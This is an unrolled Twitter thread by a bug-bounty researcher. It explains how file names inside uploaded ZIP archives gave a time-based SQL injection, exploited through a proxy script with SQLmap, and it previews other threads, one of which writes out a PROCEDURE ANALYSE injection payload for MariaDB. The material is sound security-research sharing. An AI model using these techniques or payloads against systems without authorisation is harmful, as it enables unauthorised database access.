Share this page!

Mustafa Can İPEKÇİ Profile picture
Twitter logo
Mar 21 6 tweets 2 min read
Few months ago @osiryszzz and me discovered an interesting case of SQL injection on the @SynackRedTeam target which was black box testing.

During recon we noticed that there was an unrestricted file upload mechanism available to the any user. #bugbounty #bugbountytips /1
We noticed that the target was only processing the ZIP files but where the content unzipped wasn't clear which was preventing potential RCE or file overwrite via ZIP bombing. /2
However it appears that each file entry inside the ZIP file was added to the database after unpacking, which we wanted to see if it's possible to achieve SQL injection, by simply making file name with SQL injection payload. /3
We confirmed that it was vulnerable to the time based SQL injection but how we were going to exploit it was in the question.

I made a simple middleware proxy like PHP script such as gist.github.com/mcipekci/29eb8… we were able to exploit the issue. /4
We forced SQLmap to send requests to the our script hosted on C2 instance which is processing payload and sending data to the actual target.

Which was very unique case of the SQL injection and was fun to exploit. /5
I hope this gives inspiration about going deeper and exploring beyond what's visible and creating your own unique techniques and solutions for cases.

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Mustafa Can İPEKÇİ

Mustafa Can İPEKÇİ Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @mcipekci

Mustafa Can İPEKÇİ Profile picture
Apr 20, 2022
As of today I passed half million milestone on @SynackRedTeam with 200k of it on last 90 days. So far this month about to catch previous one too, we will see what is going to happen in next 10 days :). #bugbounty #bugbountytips ImageImage
Almost all my bugs this month was SQLis again. I'll try to give another example from the unique ones.
One of the targets was having SQLi on some weird endpoint. It was expecting XML data but looks like it was looking for "xml" as parameter.
Read 8 tweets
Mustafa Can İPEKÇİ Profile picture
Feb 26, 2022
On recent engagements to the on program on @SynackRedTeam, I find out that target had error based SQL injection on LIMIT clause, it appears that DBMS was MariaDB 10.4.13 so it was limiting options to be used on the injection. #bugbountytips #bugbounty 1/5
Only way to exploit the vulnerability was using PROCEDURE ANALYSE on the injection point. However we were not able to use subqueries inside analyse because it's not allowed. So our options were limited to fetch stuff like database(), user() etc. 2/5
Payload for injection was like this 1+procedure+analyse(extractvalue(rand(),version()),1). However this will only allow us to retrieve version of the DBMS, then I started to check which other functions are available to use with in permissions of the current user. 3/5
Read 6 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Send Email!

:(